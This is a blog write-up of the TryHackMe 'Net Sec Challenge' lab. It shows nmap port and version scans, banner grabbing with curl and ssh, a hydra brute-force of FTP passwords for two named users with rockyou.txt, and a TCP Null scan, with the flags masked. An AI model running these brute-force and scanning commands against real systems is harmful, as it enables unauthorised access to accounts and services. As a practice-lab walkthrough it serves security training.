TryHackMe - Net Sec Challenge - Write Up

Task 1

Start Attack Machine + the target.

[Optional] Create ENV variable for IP of target to save time

root@ip-10-10-245-205:~# export ip="10.10.36.158"
root@ip-10-10-245-205:~# echo $ip
10.10.36.158

Task 2

The first three questions can be answered with one nmap scan:

>> What is the highest port number being open less than 10,000?

>> There is an open port outside the common 1000 ports; it is above 10,000. What is it?

>> How many TCP ports are open?

nmap -p- -T5 $ip

-p- scan all ports -T5 faster/louder scanning $ip target IP that we declared in Task 1

Result

Host is up (0.00048s latency).
Not shown: 65529 closed ports
PORT      STATE SERVICE
xx/tcp    open  ssh
xx/tcp    open  http
xxx/tcp   open  netbios-ssn
xxx/tcp   open  microsoft-ds
xxxx/tcp  open  http-proxy
xxxxx/tcp open  unknown

You can now answer the first three questions.

>> What is the flag hidden in the HTTP server header?

There are multiple ways to get the http header flag.

Using curl

curl -I $ip

-I / --head - only fetch the headers

Result

# curl -I $ip
HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "229449419"
Last-Modified: Tue, 14 Sep 2021 07:33:09 GMT
Content-Length: 226
Date: Sat, 10 Feb 2024 14:54:59 GMT
Server: lighttpd xxx{xxxxxxxxxxxx}

Side note: not relevant for this lab, but add -L to the command if the target is after a 301 or 302 redirect

Using nmap

nmap -p 80 -A $ip

-p 80 scan only port 80 (webserver) -A OS and version detection

Result

[...]
PORT   STATE SERVICE VERSION
80/tcp open  http    lighttpd
|_http-server-header: lighttpd xxx{xxxxxxxxxxxx}
|_http-title: Hello, world!
MAC Address: 02:C3:78:16:23:15 (Unknown)
[...]

Using your browser

Open browser
open $ip homepage
open browser dev tools
navigate to network tab
refresh page without cache, should be CTLR + SHIFT + r
click on 200 http response of root dir /
check the Response Headers section for the flag lighttpd xxx{xxxxxxxxxxxx}

>> What is the flag hidden in the SSH server header?

Using ssh client

ssh -v whatever@$ip

-v verbose output to get the banner/header information whatever@$ip random username tries to login on target

Result

[...]
debug1: match: OpenSSH_8.2p1 xxx{xxxxxxxxxxxx} pat OpenSSH* compat 0x04000000
[...]

Using nmap

nmap -p 22 -A $ip

-p 22 scan only port 22 (ssh daemon) -A OS and version detection

Result

[...]
PORT   STATE SERVICE VERSION
22/tcp open  ssh     (protocol 2.0)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-OpenSSH_8.2p1 xxx{xxxxxxxxxxxx}
[...]

>> We have an FTP server listening on a nonstandard port. What is the version of the FTP server?

So, the first nmap scan showed us all used services but one: the last port over 10000. To get more information about it, we can use nmap yet again.

nmap -A -p 10021 $ip

Result

PORT      STATE SERVICE VERSION
10021/tcp open  ftp     xxxxx x.x.x
[...]

So, we see that a common FTP service is running there and the version, which is our answer.

>> We learned two usernames using social engineering: eddie and quinn. What is the flag hidden in one of these two account files and accessible via FTP?

To solve this, we need to get access to the FTP server. To brute force our way in, we'll use hydra and the rockyou.txt password list.

Step 1: If you are not sure where the rockyou.txt is, simply find it with locate:

# locate rockyou.txt
/usr/share/wordlists/rockyou.txt

Step 2: Create a new file usernames.txt with quinn and eddie with each name in a single line. Use your favorite editor or ...

printf %"s\n" eddie quinn > usernames.txt

printf similiar to echo, but more consistent %"s\n" replace space with a line break \n eddie quinn the user names we were given > usernames.txt write output to a file

Side note: you can skip this step if you just want to use one user name

Step 3: Use hydra to brute force FTP access for both usernames

hydra -L usernames.txt -P /usr/share/wordlists/rockyou.txt ftp://$ip:10021

Result

[...]
[DATA] attacking ftp://10.10.36.158:10021/
[10021][ftp] host: 10.10.36.158   login: quinn   password: ******
[10021][ftp] host: 10.10.36.158   login: eddie   password: *****
1 of 1 target successfully completed, 2 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2024-02-10 15:57:04

Success!

Step 4: Log into the FTP server with credentials and retreive flag file.

ftp $ip 10021 Log on

Insert username and password and check with ls if the flag is there.

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.

-rw-rw-r--    1 1002     1002           18 Sep 20  2021 ftp_flag.txt
226 Directory send OK.

Now use get ftp_flag.txt to download the file to the host machine:

ftp> get ftp_flag.txt
local: ftp_flag.txt remote: ftp_flag.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for ftp_flag.txt (18 bytes).
226 Transfer complete.
18 bytes received in 0.00 secs (7.7403 kB/s)

Use exit to disconnect from the FTP server and show the content of the flag file:

cat ftp_flag.txt
xxx{xxxxxxxxxxxx}

Done.

>> Browsing to http://10.10.36.158:8080 displays a small challenge that will give you a flag once you solve it. What is the flag?

This flag is a little bit weird. What am I supposed to check or scan? Every scan failed, so I had to look it up and the answer seems to be a simple nmap scan with the -sN flag.

Open page on port 8080
Reset the packet count with the button
start nmap -sN $ip (which is a TCP Null scan)
Flag will show on the page Exercise Complete! Task answer: xxx{xxxxxxxxxxxx}

E-Mail hellofoo@ittafoovern.comcom

04.02.2024 Adding a trash can to Linux with trash-cli
20.01.2024 Bandwidth Measurement using netcat on Linux
14.01.2024 Getting started with rsync - Comprehensive Guide
10.01.2024 Cron Jobs on Linux - Comprehensive Guide with Examples
22.11.2023 SSH Server Hardening Guide v2